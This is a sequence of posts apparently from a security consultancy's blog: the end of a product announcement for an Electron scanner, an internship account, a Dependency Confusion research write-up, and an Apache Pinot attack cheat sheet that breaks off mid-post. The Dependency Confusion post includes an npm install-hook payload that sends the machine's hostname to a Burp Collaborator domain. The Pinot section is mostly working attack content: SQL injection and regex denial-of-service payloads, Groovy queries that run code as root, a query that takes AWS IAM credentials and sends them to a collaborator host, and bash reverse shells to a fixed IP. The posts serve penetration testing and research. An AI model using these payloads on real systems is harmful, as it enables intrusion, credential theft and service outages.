However, the most significant improvement revolves around the creation of Electron-dependent checks. ElectroNG will attempt to determine the specific version of the framework in use by the application and dynamically adjust the scan results based on that. Considering that Electron APIs and options change very frequently, this boosts the tool’s reliability in determining things that matter.

To provide a concrete example to the reader, let’s consider a lesser-known setting named affinity. Electron v2 introduced a new BrowserView/BrowserWindow webPreferences option for gathering several windows into a single process. When specified, web pages loaded by BrowserView/BrowserWindow instances with the same affinity will run in the same renderer process. While this setting was meant to improve performance, it leads to unexpected results across different Electron versions.

Let’s consider the following code snippet:

function createWindow () {
  // Create the browser window.
  firstWin = new BrowserWindow({
    width: 800,
    height: 600,
    webPreferences: {
      nodeIntegration: true,
      affinity: "secPrefs"
    }
  })

  secondWin = new BrowserWindow({
    width: 800,
    height: 600,
    webPreferences: {
      nodeIntegration: false,
      affinity: "secPrefs"
    }
  })

  firstWin.loadFile('index.html')
  secondWin.loadFile('index.html')

Looking at the nodeIntegration setting defined by the two webPreferences definitions, one might expect the first BrowserWindow to have access to Node.js primitives while the second one to be isolated. This is not always the case and this inconsistency might leave an insecure BrowserWindow open to attackers.

The results across different Electron versions are surprising to say the least:

The affinity option has been fully deprecated in v14 as part of the Electron maintainers’ plan to more closely align with Chromium’s process model for security, performance, and maintainability. This example demonstrates two important things around renderers’ settings:

The specific Electron in use determines which webPreferences are applicable and which aren’t
The semantic and security implications of some webPreferences change based on the specific version of the framework

Terms and Price

ElectroNG is available for online purchase at $688/year per user. Visit https://get-electrong.com/buy.html.

The license does not limit the number of projects, scans, or even installations as long as the software is installed on machines owned by a single individual person. If you’re a consultant, you can run ElectroNg for any number of applications, as long as you are running it and not your colleagues or clients. For bulk orders (over 50 licenses), contact us!

Electronegativity & ElectroNG

With the advent of ElectroNG, we have already received emails asking about the future of Electronegativity.

Electronegativity & ElectroNG will coexist. Doyensec will continue to support the OSS project as we have done for the past years. As usual, we look forward to external contributions in the form of pull requests, issues, and documentation.

ElectroNG’s development focus will be towards features that are important for the paid customers with the ultimate goal of providing an effective and easy-to-use security scanner for Electron apps. Having a team behind this new project will also bring innovation to Electronegativity since bug fixes and features that are applicable to the OSS version will be also ported.

As successfully done in the past by other projects, we hope that the coexistence of a free community and paid versions of the tool will give users the flexibility to pick whatever fits best. Whether you’re an individual developer, a small consulting boutique, or a big enterprise, we believe that Electronegativity & ElectroNG can help eradicate security vulnerabilities from your Electron-based applications.

My Internship Experience at Doyensec

2022-08-24T00:00:00+02:00

Throughout the Summer of 2022, I worked as an intern for Doyensec. I’ll be describing my experience with Doyensec in this blog post so that other potential interns can decide if they would be interested in applying.

The Recruitment Process

The recruitment process began with a non-technical call about the internship to make introductions and exchange more information. Once everyone agreed it was a fit, we scheduled a technical challenge where I was given two hours to provide my responses. I enjoyed the challenge and did not find it to be a waste of time. After the technical challenge, I had two technical interviews with different people (Tony and John). I thought these went really well for questions about web security, but I didn’t know the answers to some questions about other areas of application security I was less familiar with. Since Doyensec performs assessments of non-web applications as well (mobile, desktop, etc.), it made sense that they would ask some questions about non-web topics. After the final call, I was provided with an offer via email.

The Work

As an intern, my time was divided between working on an internal training presentation, conducting research, and performing security assessments. Creating the training presentation allowed me to learn more about a technical topic that will probably be useful for me in the future, whether at Doyensec or not. I used some of my research time to learn about the topic and make the presentation. My presentation was on the advanced features of Semgrep, the open-source static code analysis tool. Doyensec often has cross-training sessions where members of the team demonstrate new tools and techniques, or just the latest “Best Bug” they found on an engagement.

Conducting research was a good experience as an intern because it allowed me to learn more about the research topic, which in my case was Electron and its implementation of web API permissions. Don’t worry too much about not having a good research topic of your own already – there are plenty of things that have already been selected as options, and you can ask for help choosing a topic if you’re not sure what to research. My research topic was originally someone else’s idea.

My favorite part of the internship was helping with security assessments. I was able to work as a normal consultant with some extra guidance. I learned a lot about different web frameworks and programming languages. I was able to see what technologies real companies are using and review real source code. For example, before the internship, I had very limited experience with applications written in Go, but now I feel mostly comfortable testing Go web applications. I also learned more about mobile applications, which I had limited experience with. In addition to learning, I was able to provide actionable findings to businesses to help reduce their risk. I found vulnerabilities of all severities and wrote reports for these with recommended remediation steps.

Should You Become an Intern?

When I was looking for an internship, I wanted to find a role that would let me learn a lot. Most of the other factors were low-priority for me because the role is temporary. If you really enjoy application security and want to learn more about it, this internship is a great way to do that. The people at Doyensec are very knowledgeable about a wide variety of application security topics, and are happy to share their knowledge with an intern.

Even though my priority was learning, it was also nice that the work is performed remotely and with flexible hours. I found that some days I preferred to stop work at around 2-3 PM and then continue in the night. I think these conditions are desirable to anyone, not just interns.

As for qualifications, Doyensec has stated that the ideal candidate:

Already has some experience with manual source code review and Burp Suite / OWASP ZAP
Learns quickly
Should be able to prepare reports in English
Is self-organized
Is able to learn from his/her mistakes
Has motivation to work/study and show initiative
Must be communicative (without this it is difficult to teach effectively)
Brings something to the mix (e.g., creativity, academic knowledge, etc.)

My experience before the internship consisted mostly of bug bounty hunting and CTFs. There are not many other opportunities for college students with zero experience, so I had spent nearly two years bug hunting part-time before the internship. I also had the OSWE certification to demonstrate capability for source code review, but this is definitely not required (they’ll test you anyway!). Simply being an active participant in CTFs with a focus on web security and code review may be enough experience. You may also have some other way of learning about web security if you don’t usually participate in CTFs.

Final Thoughts

I enjoyed my internship at Doyensec. There was a good balance between learning and responsibility that has prepared me to work in an application security role at Doyensec or elsewhere.

Dependency Confusion

2022-07-21T00:00:00+02:00

On Feb 9th, 2022 PortSwigger announced Alex Birsan’s Dependency Confusion as the winner of the Top 10 web hacking techniques of 2021. Over the past year this technique has gained a lot of attention. Despite that, in-depth information about hunting for and mitigating this vulnerability is scarce.

I have always believed the best way to understand something is to get hands-on experience. In the following post, I’ll show the results of my research that focused on creating an all-around tool (named Confuser) to test and exploit potential Dependency Confusion vulnerabilities in the wild. To validate the effectiveness, we looked for potential Dependency Injection vulnerabilities in top ElectronJS applications on Github (spoiler: it wasn’t a great idea!).

The tool has helped Doyensec during engagements to ensure that our clients are safe from this threat, and we believe it can facilitate testing for researchers and blue-teams too.

So… what is Dependency Confusion?

Dependency confusion is an attack against the build process of the application. It occurs as a result of a misconfiguration of the private dependency repositories. Vulnerable configurations allow downloading versions of local packages from a main public repository (e.g., registry.npmjs.com for NPM). When a private package is registered only in a local repository, an attacker can upload a malicious package to the main repository with the same name and higher version number. When a victim updates their packages, malicious code will be downloaded and executed on a build or developer machine.

Why is it so hard to study Dependency Injection?

There are multiple reasons why, despite all the attention, Dependency Confusion seems to be so unexplored.

There are plenty of dependency management systems

Each programming language utilizes different package management tools, most with their own repositories. Many languages have multiple of them. JavaScript alone has NPM, Yarn and Bower to name a few. Each tool comes with its own ecosystem of repositories, tools, options for local package hosting (or lack thereof). It is a significant time cost to include another repository system when working with projects utilizing different technology stacks.

In my research I have decided to focus on the NPM ecosystem. The main reason for that is its popularity. It’s a leading package management system for JavaScript and my secondary goal was to test ElectronJS applications for this vulnerability. Focusing on NPM would guarantee coverage on most of the target applications.

Actual exploitation requires interaction with 3rd party services

In order to exploit this vulnerability, the researcher needs to upload a malicious package to a public repository. Rightly so, most of them actively work against such practices. On NPM, malicious packages are flagged and removed along with banning of the owner account.

During the research, I was interested in observing how much time an attacker has before their payload is removed from the repository. Additionally, NPM is not actually a target of the attack, so among my goals was to minimize the impact on the platform itself and its users.

Reliable information extraction from targets is hard

In the case of a successful exploitation, a target machine is often a build machine inside a victim organization’s network. While it is a great reason why this attack is so dangerous, extracting information from such a network is not always an easy task.

In his original research, Alex proposes DNS extraction technique to extract information of attacked machines. This is the technique I have decided to use too. It requires a small infrastructure with a custom DNS server, unlike most web exploitation attacks, where often only an HTTP Proxy or browser is enough. This highlights why building tools such as mine is essential, if the community is to hunt these bugs reliably.

The tool

So, how to deal with those problems? I have decided to try and create Confuser - a tool that attempts to solve the aforementioned issues.

The tool is OSS and available at https://github.com/doyensec/confuser.

Be respectful and don’t create problems to our friends at NPM!

The process

Researching any Dependency Confusion vulnerability consists of three steps.

Step 1) Reconnaissance

Finding Dependency Confusion bugs requires a package file that contains a list of application dependencies. In case of projects utilizing NPM, the package.json file holds such information:

{
  "name": "Doyensec-Example-Project",
  "version": "1.0.0",
  "description": "This is an example package. It uses two dependencies: one is a public one named axios. The other one is a package hosted in a local repository named doyensec-library.",
  "main": "index.js",
  "author": "Doyensec LLC <info@doyensec.com>",
  "license": "ISC",
  "dependencies": {
    "axios": "^0.25.0",
    "doyensec-local-library": "~1.0.1",
    "another-doyensec-lib": "~2.3.0"
  }
}

When a researcher finds a package.json file, their first task is to identify potentially vulnerable packages. That means packages that are not available in the public repository. The process of verifying the existence of a package seems pretty straightforward. Only one HTTP request is required. If a response status code is anything but 200, the package probably does not exist:

def check_package_exists(package_name):
    response = requests.get(NPM_ADDRESS + "package/" + package_name, allow_redirects=False)

    return (response.status_code == 200)

Simple? Well… almost. NPM also allows scoped package names formatted as follows: @scope-name/package-name. In this case, package can be a target for Dependency Confusion if an attacker can register a scope with a given name. This can be also verified by querying NPM:

def check_scope_exists(package_name):
    split_package_name = package_name.split('/')
    scope_name = split_package_name[0][1:]
    response = requests.get(NPM_ADDRESS + "~" + scope_name, alow_redirects=False)

The tool I have built allows the streamlining of this process. A researcher can upload a package.json file to my web application. In the backend, the file will be parsed, and have its dependencies iterated. As a result, a researcher receives a clear table with potentially vulnerable packages and the versions for a given project:

The downside of this method is the fact, that it requires enumerating the NPM service and dozens of HTTP requests per each project. In order to ease the strain put on the service, I have decided to implement a local cache. Any package name that has been once identified as existing in the NPM registry is saved in the local database and skipped during consecutive scans. Thanks to that, there is no need to repeatedly query the same packages. After scanning about 50 package.json files scraped from Github I have estimated that the caching has decreased the number of required requests by over 40%.

Step 2) Payload generation and upload

Successful exploitation of a Dependency Confusion vulnerability requires a package that will call home after it has been installed by the victim. In the case of the NPM, the easiest way to do this is by exploiting install hooks. NPM packages allow hooks that ran each time a given package is installed. Such functionality is the perfect place for a dependency payload to be triggered. The package.json template I used looks like the following:

{
  "name": {package_name},
  "version": {package_version},
  "description": "This package is a proof of concept used by Doyensec LLC to conduct research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on a victim's machines. The code is not malicious in any way and will be deleted after the research survey has been concluded. Doyensec LLC does not accept any liability for any direct, indirect, or consequential loss or damage arising from the use of, or reliance on, this package.",
  "main": "index.js",
  "author": "Doyensec LLC <info@doyensec.com>",
  "license": "ISC",
  "dependencies": { },
  "scripts": {
    "install": "node extract.js {project_id}"
  }
}

Please note the description that informs users and maintainers about the purpose of the package. It is an attempt to distinguish the package from a malicious one, and it serves to inform both NPM and potential victims about the nature of the operation.

The install hook runs the extract.js file which attempts to extract minimal data about the machine it has been run on:

const https = require('https');
var os = require("os");
var hostname = os.hostname();

const data = new TextEncoder().encode(
  JSON.stringify({
    payload: hostname,
    project_id: process.argv[2]
  })
);

const options = {
  hostname: process.argv[2] + '.' + hostname + '.jylzi8mxby9i6hj8plrj0i6v9mff34.burpcollaborator.net',
  port: 443,
  path: '/',
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Content-Length': data.length
  },
  rejectUnauthorized: false
}

const req = https.request(options, res => {});
req.write(data);
req.end();

I’ve decided to save time on implementing a fake DNS server and use the existing infrastructure provided by Burp Collaborator. The file will use a given project’s ID and victim’s hostname as subdomains and try to send an HTTP request to the Burp Collaborator domain. This way my tool will be able to assign callbacks to proper projects along with the victims’ hostnames.

After the payload generation, the package is published to the public NPM repository using the npm command itself: npm publish.

Step 3) Callback aggregation

The final step in the chain is receiving and aggregating the callbacks. As stated before, I have decided to use a Burp Collaborator infrastructure. To be able to download callbacks to my backend I have implemented a simple Burp Collaborator client in Python:

class BurpCollaboratorClient():

    BURP_DOMAIN = "polling.burpcollaborator.net"

    def __init__(self, colabo_key, colabo_subdomain):
        self.colabo_key = colabo_key
        self.colabo_subdomain = colabo_subdomain

    def poll(self):
        params = {"biid": self.colabo_key}
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"}

        response = requests.get(
            "https://" + self.BURP_DOMAIN + "/burpresults", params=params, headers=headers)#, proxies=PROXIES, verify=False)

        if response.status_code != 200:
            raise Error("Failed to poll Burp Collaborator")

        result_parsed = json.loads(response.text)
        return result_parsed.get("responses", [])

After polling, the returned callbacks are parsed and assigned to the proper projects. For example if anyone runs npm install on an example project I have shown before, it’ll render the following callbacks in the application:

Test run

To validate the effectiveness of Confuser, we decided to test Github’s top 50 ElectronJS applications.

I have extracted a list of Electron Applications from the official ElectronJS repository available here. Then, I used the Github API to sort the repositories by the number of stars. For the top 50, I have scraped the package.json files.

This is the Node script to scrape the files:

for (i = 0; i < 50 && i < repos.length;) {
    let repo = repos[i]
    await octokit
      .request("GET /repos/" + repo.repo + "/commits?per_page=1", {})
      .then((response) => {
        var sha = response.data[0].sha
        return octokit.request("GET /repos/" + repo.repo + "/git/trees/:sha?recursive=1", {
          "sha": sha
        });
      })
      .then((response) => {
        for (file_index in response.data.tree) {
          file = response.data.tree[file_index];
          if (file.path.endsWith("package.json")) {
            return octokit.request("GET /repos/" + repo.repo + "/git/blobs/:sha", {
              "sha": file.sha
            });
          }
        }

        return null;
      })
      .then((response) => {
        if (!response) return null;
        i++;
        var package_json = Buffer.from(response.data.content, 'base64').toString('utf-8');
        repoNameSplit = repo.repo.split('/');
        return fs.writeFileSync("package_jsons/" + repoNameSplit[0]+ '_' + repoNameSplit[1] + ".json", package_json);
      });
  }

The script takes the newest commit from each repo and then recursively searches its files for any named package.json. Such files are downloaded and saved locally.

After downloading those files, I uploaded them to the Confuser tool. It resulted in scanning almost 3k dependency packages. Unfortunately only one application had some potential targets. As it turned out, it was taken from an archived repository, so despite having a “malicious” package in the NPM repository for over 24h (after which, it was removed by NPM) I’d received no callbacks from the victim. I had received a few callbacks from some machines that seemed to have downloaded the application for analysis. This also highlighted a problem with my payload - getting only the hostname of the victim might not be enough to distinguish an actual victim from false positives. A more accurate payload might involve collecting information such as local paths and local users which opens up to privacy concerns.

Example false positives:

In hindsight, it was a pretty naive approach to scrape package.json files from public repositories. Open Source projects most likely use only public dependencies and don’t rely on any private infrastructures. On the last day of my research, I downloaded a few closed source Electron apps. Unpacking them, I was able to extract the package.json in many cases but none yield any interesting results.

Summary

We’re releasing Confuser - a newly created tool to find and test for Dependency Confusion vulnerabilities. It allows scanning packages.json files, generating and publishing payloads to the NPM repository, and finally aggregating the callbacks from vulnerable targets.

This research has allowed me to greatly increase my understanding of the nature of this vulnerability and the methods of exploitation. The tool has been sufficiently tested to work well during Doyensec’s engagements. That said, there are still many improvements that can be done in this area:

Implement its own DNS server or at least integrate with Burp’s self-hosted Collaborator server instances
Add support for other languages and repositories

Additionally, there seems to be several research opportunities in the realm of Dependency Confusion vulnerabilities:

It seems promising to expand the research to closed-source ElectronJS applications. While high profile targets like Microsoft will probably have their bases covered in that regard (also because they were targeted by the original research), there might be many more applications that are still vulnerable
Researching other dependency management platforms. The original research touches on NPM, Ruby Gems, Python’s PIP, JFrog and Azure Artifacts. It is very likely that similar problems exist in other environments

Apache Pinot SQLi and RCE Cheat Sheet

2022-06-09T00:00:00+02:00

The database platform Apache Pinot has been growing in popularity. Let’s attack it!

This article will help pentesters use their familiarity with classic database systems such as Postgres and MariaDB, and apply it to Pinot. In this post, we will show how a classic SQL-injection (SQLi) bug in a Pinot-backed API can be escalated to Remote Code Execution (RCE) and then discuss post-exploitation.

What Is Pinot?
Essential Architectural Details
Setting Up a Test Environment
Pinot SQL Syntax & Injection Basics
- String Matching
- Query Options
  - CTF-grade SQL injection
Timeouts
SQL Injection in Pinot
RCE via Groovy
- RCE Example Queries
Use RCE on Server to Attack Other Nodes
TLDR

What Is Pinot?

Pinot is a real-time distributed OLAP datastore, purpose-built to provide ultra low-latency analytics, even at extremely high throughput.

Huh? If it helps, most articles try to explain OLAP (OnLine Analytical Processing) by showing a diagram of your 2D database table turning into a cube, but for our purposes we can ignore all the jargon.

Apache Pinot is a database system which is tuned for analytics queries (Business Intelligence) where:

data is being streamed in, and needs to be instantly queryable
many users need to perform complicated queries at the same time
the queries need to quickly aggregate or filter terabytes of data

Pinot was started in 2013 at LinkedIn, where it now

powers some of LinkedIn’s more recognisable experiences such as Who Viewed My Profile, Job, Publisher Analytics, […] Pinot also powers LinkedIn’s internal reporting platform…

Pinot is unlikely to be used for storing a fairly static table of user emails and password hashes. It is more likely to be found ingesting a stream of orders or user actions from Kafka for analysis via an internal dashboard. Takeaway delivery platform UberEats gives all restaurants access to a Pinot-powered dashboard which

enables the owner of a restaurant to get insights from Uber Eats orders regarding customer satisfaction, popular menu items, sales, and service quality analysis. Pinot enables slicing and dicing the raw data in different ways and supports low latency queries…

Essential Architectural Details

Pinot is written in Java.

Table data is partitioned / sharded into Segments, usually split based on timestamp, which can be stored in different places.

Apache Pinot is a cluster formed of different components, the essential ones being Controllers, Servers and Brokers.

Server

The Server stores segments of data. It receives SQL queries via GRPC, executes them and returns the results.

Broker

The Broker has an exposed HTTP port which clients send queries to. The Broker analyses the query and queries the Servers which have the required segments of data via GRPC. The client receives the results consolidated into a single response.

Controller

Maintains cluster metadata and manages other components. It serves admin endpoints and endpoints for uploading data.

Zookeeper

Apache Zookeeper is used to store cluster state and metadata. There may be multiple brokers, servers and controllers (LinkedIn claims to have more than 1000 nodes in a cluster), so Zookeeper is used to keep track of these nodes and which servers host which segments. Essentially it’s a hierarchical key-value store.

Setting Up a Test Environment

Following the Kubernetes quickstart in Minikube is an easy way to create a multi-node environment. The documentation walks through the steps to install the Pinot Helm chart, set up ingestion via Kafka, and expose port 9000 of the Controller to access the query editor and cluster management UI. If things break horrifically, you can just minikube delete to wipe everything and start again.

The only recommendations are to:

Set image.tag in kubernetes/helm/pinot/values.yaml to a specific Pinot release (e.g. release-0.10.0) rather than latest to test a specific version.
Install the Pinot chart from ./kubernetes/helm/pinot to use your local configuration changes rather than pinot/pinot which fetches values from the Github master branch.
Use stern -n pinot-quickstart pinot to tail logs from all nodes.

Pinot SQL Syntax & Injection Basics

While Pinot syntax is based on Apache Calcite, many features in the Calcite reference are unsupported in Pinot. Here are some useful language features which may help to identify and test a Pinot backend.

Strings

Strings are surrounded by single-quotes. Single-quotes can be escaped with another single-quote. Double quotes denote identifiers e.g. column names.

String concatenation

Performed by the 3-parameter function CONCAT(str1, str2, separator). The + sign only works with numbers.

SELECT "someColumn", 'a ''string'' with quotes', CONCAT('abc','efg','d') FROM myTable

Substrings

SUBSTR(col, startIndex, endIndex) where indexes start at 0 and can be negative to count from the end. This is different from Postgres and MySQL where the last parameter is a length.

SELECT SUBSTR('abcdef', -3, -1) FROM ignoreMe -- 'def'

Length

LENGTH(str)

Comments

Line comments -- do not require surrounding whitespace. Multiline comments /* */ raise an error if the closing */ is missing.

Filters

Basic WHERE filters need to reference a column. Filters which do not operate on any column will raise errors, so SQLi payloads such as ' OR ''=' will fail:

SELECT * FROM airlineStatsAvro
WHERE 1 = 1
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 1 should not be null.
-- Potentially invalid column name specified.
SELECT * FROM airlineStatsAvro
WHERE year(NOW()) > 0
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 2022 should not be null.
-- Potentially invalid column name specified.

As long as you know a valid column name, you can still return all records e.g.:

SELECT * FROM airlineStatsAvro
WHERE 0 = Year - Year AND ArrTimeBlk != 'blahblah-bc'

BETWEEN

SELECT * FROM transcript WHERE studentID between 201 and 300

IN

Use col IN (literal1, literal2, ...).

SELECT * FROM transcript WHERE UPPER(firstName) IN ('NICK','LUCY')

String Matching

In LIKE filters, % and _ are converted to regular expression patterns .* and .

The REGEXP_LIKE(col, regex) function uses a java.util.regex.Pattern case-insensitive regular expression.

WHERE REGEXP_LIKE(alphabet, '^a[Bcd]+.*z$')

Both methods are vulnerable to Denial of Service (DoS) if users can provide their own unsanitised search queries e.g.:

LIKE '%%%%%%%%%%%%%zz'
REGEXP_LIKE(col, '((((((.*)*)*)*)*)*)*zz')

These filters will run on the Pinot server at close to 100% CPU forever (OK, for a very very long time depending on the data in the column).

UNION

No.

Stacked / Batched Queries

Nope.

JOIN

Limited support for joins is in development. Currently it is possible to join with offline tables with the lookUp function.

Subqueries

Limited support. The subquery is supposed to return a base64-encoded IdSet. An IdSet is a data structure (compressed bitmap or Bloom filter) where it is very fast to check if an Id belongs in the IdSet. The IN_SUBQUERY (filtered on Broker) or IN_PARTITIONED_SUBQUERY (filtered on Server) functions perform the subquery and then use this IdSet to filter results from the main query.

WHERE IN_SUBQUERY(
  yearID,
  'SELECT ID_SET(yearID) FROM baseballStats WHERE teamID = ''BC'''
  ) = 1

Database Version

It is common to SELECT @@VERSION or SELECT VERSION() when fingerprinting database servers. Pinot lacks this feature. Instead, the presence or absence of functions and other language features must be used to identify a Pinot server version.

Information Schema Tables

No.

Data Types

Some Pinot functions are sensitive to the column types in use (INT, LONG, BYTES, STRING, FLOAT, DOUBLE). The hash functions like SHA512, for instance, will only operate on BYTES columns and not STRING columns. Luckily, we can find the undocumented toUtf8 function in the source code and convert strings into bytes:

SELECT md5(toUtf8(somestring)) FROM table

CASE

Simple case:

SELECT
  CASE firstName WHEN 'Lucy' THEN 1 WHEN 'Bob', 'Nick' THEN 2 ELSE 'x' END
FROM transcript

Searched case:

SELECT
  CASE WHEN firstName = 'Lucy' THEN 1 WHEN firstName = 'Bob' THEN 2.1 ELSE 'x' END
FROM transcript

Query Options

Certain query options such as timeouts can be added with OPTION(key=value,key2=value2). Strangely enough, this can be added anywhere inside the query, and I mean anywhere!

SELECT studentID, firstOPTION(timeoutMs=1)Name
froOPTION(timeoutMs=1)m tranOPTION(timeoutMs=2)script
WHERE firstName OPTION(timeoutMs=1000) = 'Lucy'
-- succeeds as the final timeoutMs is long (1000ms)

SELECT * FROM transcript WHERE REGEXP_LIKE(firstName, 'LuOPTION(timeoutMs=1)cy')
-- BrokerTimeoutError:
-- Query timed out (time spent: 4ms, timeout: 1ms) for table: transcript_OFFLINE before scattering the request
--
-- With timeout 10ms, the error is:
-- 427: 1 servers [pinot-server-0_O] not responded
--
-- With an even larger timeout value the query succeeds and returns results for 'Lucy'.

Yes, even inside strings!

In a Pinot-backed search API, queries for thingumajig and thinguOPTION(a=b)majig should return identical results, assuming the characters ()= are not filtered by the API.

This is also potentially a useful WAF bypass.

CTF-grade SQL injection

In far-fetched scenarios, this could be used to comment out parts of a SQL query, e.g. a route /getFiles?category=)&title=%25oPtIoN( using a prepared statement to produce the SQL:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%oPtIoN('
  and topSecret = false
  and category LIKE ')'

Everything between OPTION( and the next ) is stripped out using regex /option\s*$[^)]+$/i. The query gets executed as:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%'

allowing access to all the top secret files!

Note that the error OPTION statement requires two parts separated by '=' occurs if there are the wrong number of equals signs inside the OPTION().

Another contrived scenario could result in SQLi and a filter bypass.

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, 'oPtIoN(a=b')
  and not topSecret
  and category = ') OR id - id = 0--'

will be processed as

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, '
  and not topSecret
  and category = ') OR id - id = 0

Timeouts

Timeouts do not work. While the Broker returns a timeout exception to the client when the query timeout is reached, the Server continues processing the query row by row until completion, however long that takes. There is no way to cancel an in-progress query besides killing the Server process.

SQL Injection in Pinot

To proceed, you’ll need a SQL injection vulnerability like for any type of database backend, where malicious user input can wind up in the query body rather than being sent as parameters with prepared statements.

Pinot backends do not support prepared statements, but the Java client has a PreparedStatement class which escapes single quotes before sending the request to the Broker and can prevent SQLi (except the OPTION() variety).

Injection may appear in a search query such as:

query = """SELECT order_id, order_details_json FROM orders
WHERE store_id IN ({stores})
  AND REGEXP_LIKE(product_name,'{query}')
  AND refunded = false""".format(
    stores=user.stores,
    query=request.query,
)

The query parameter can be abused for SQL injection to return all orders in the system without the restriction to specific store IDs. An example payload is !xyz') OR store_id - store_id = 0 OR (product_name = 'abc! which will produce the following SQL query:

SELECT order_id, order_details_json FROM orders
WHERE store_id IN (12, 34, 56)
  AND REGEXP_LIKE(product_name,'!xyz') OR store_id - store_id = 0 OR (product_name = 'abc!')
  AND refunded = false

The logical split happens on the OR, so records will be returned if either:

store_id IN (12, 34, 56) AND REGEXP_LIKE(product_name,'!xyz') (unlikely to have any results)
store_id - store_id = 0 (always true, so all records are returned)
(product_name = 'abc!') AND refunded = false (unlikely to have any results)

If the query template used by the target has no new lines, the query can alternatively be ended with a line comment !xyz') OR store_id - store_id = 0--.

RCE via Groovy

While maturity is bringing improvements, secure design has not always been a priority. Pinot trusts anyone who can query the database to also execute code on the Server, as root 😲. This ~~feature~~ gaping security hole is enabled by default in all released versions of Apache Pinot. It was disabled by default in a commit on May 17, 2022 but this commit has not yet made it into a release.

Scripts are written in the Groovy language. This is a JVM-based language, allowing you to use all your favourite Java methods. Here’s some Groovy syntax you might care about:

// print to Server log (only going to be useful when testing locally)
println 3
// make a variable
def data = 'abc'
// interpolation by using double quotes and $ARG or ${ARG}
def moredata = "${data}def"  // abcdef
// execute shell command, wait for completion and then return stdout
'whoami'.execute().text
// launch shell command, but do not wait for completion
"touch /tmp/$arg0".execute()
// execute shell command with array syntax, helps avoid quote-escaping hell
["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/53 0>&1 &"].execute()
// a semicolon must be placed after the final closing bracket of an if-else block
if (true) { a() } else { b() }; return "a"

To execute Groovy, use:

GROOVY(
  '{"returnType":"INT or STRING or some other data type","isSingleValue":true}',
  'groovy code on one line',
  MaybeAColumnName,
  MaybeAnotherColumnName
)

If columns (or transform functions) are specified after the groovy code, they appear as variables arg0, arg1, etc. in the Groovy script.

RCE Example Queries

Whoami

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "whoami".execute().text; return 1'
) = 1 limit 5

Prints root to the log! The official Pinot docker images run Groovy scripts as root.

Note that:

The Groovy function is an exception to the earlier rule requiring filters to include a column name.
Even though the limit is 5, every row in each segment being searched is processed. Once 5 rows are reached, the query returns results to the Broker, but the root lines continue being printed to the log.
The return and comparison values need not be the same. However the types must match returnType in the metadata JSON (here INT).
The return keyword is optional for the final statement, so the script could could end with ; 1.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "hello $arg0"; "touch /tmp/id-$arg0".execute(); 42',
  id
) = 3

In /tmp, expect root-owned files id-1, id-2, id-3, etc. for each row.

AWS

Steal temporary AWS IAM credentials from pinot-server.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'def aws = "169.254.169.254/latest/meta-data/iam/security-credentials/";',
    'def collab = "xyz.burpcollaborator.net/";',
''),'def role = "curl -s ${aws}".execute().text.split("\n")[0].trim();',
''),'def creds = "curl -s ${aws}${role}".execute().text;',
''),'["curl", collab, "--data", creds].execute(); 0',
  '')
) = 1

Could give access to cloud resources like S3. The code can of course be adapted to work with IMDSv2.

Reverse Shell

The goal is really to have a root shell from which to explore the cluster at your leisure without your commands appearing in query logs. You can use the following:

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/443 0>&1 &"].execute(); return 1'
) = 1

to spawn loads of reverse shells at the same time, one per row.

root@pinot-server-1:/opt/pinot#

You will be root on whichever Server instances are chosen by the broker based on which Servers contain the required table segments for the query.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"STRING","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute().text'
) = 'x'

This launches one reverse shell. If you accidentally kill the shell, however far into the future, a new reverse shell attempt will be spawned as the Server processes the next row. Yes, the client and Broker will see the query timeout, but the Server will continue executing the query until completion.

Tuning

When coming across Pinot for the first time on an engagement, we used a Groovy query similar to the AWS one above. However, as you can already guess, this launched tens of thousands of requests at Burp Collaborator over a span of several hours with no way to stop the runaway query besides confessing our sin to the client.

To avoid spawning thousands of processes and causing performance degradation and potentially a Denial of Service, limit execution to a single row with an if statement in Groovy.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'if (arg0 == "489") {',
    '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute();',
''),'return 1;',
''),'};',
''),'return 0',
  ''),
  id
) = 1

A reverse shell is spawned only for the one row with id 489.

Use RCE on Server to Attack Other Nodes

We have root access to a Server via our reverse shell, giving us access to:

All the segment data stored on the Server
Configuration and environment variables with the locations of other services such as Broker and Zookeeper
Potentially keys to the cloud environment with juicy IAM permissions

As we’re root here already, let’s try to use our foothold to affect other parts of the Pinot cluster such as Zookeeper, Brokers, Controllers, and other Servers.

First we should check the configuration.

root@pinot-server-1:/opt/pinot# cat /proc/1/cmdline | sed 's/\x00/ /g'
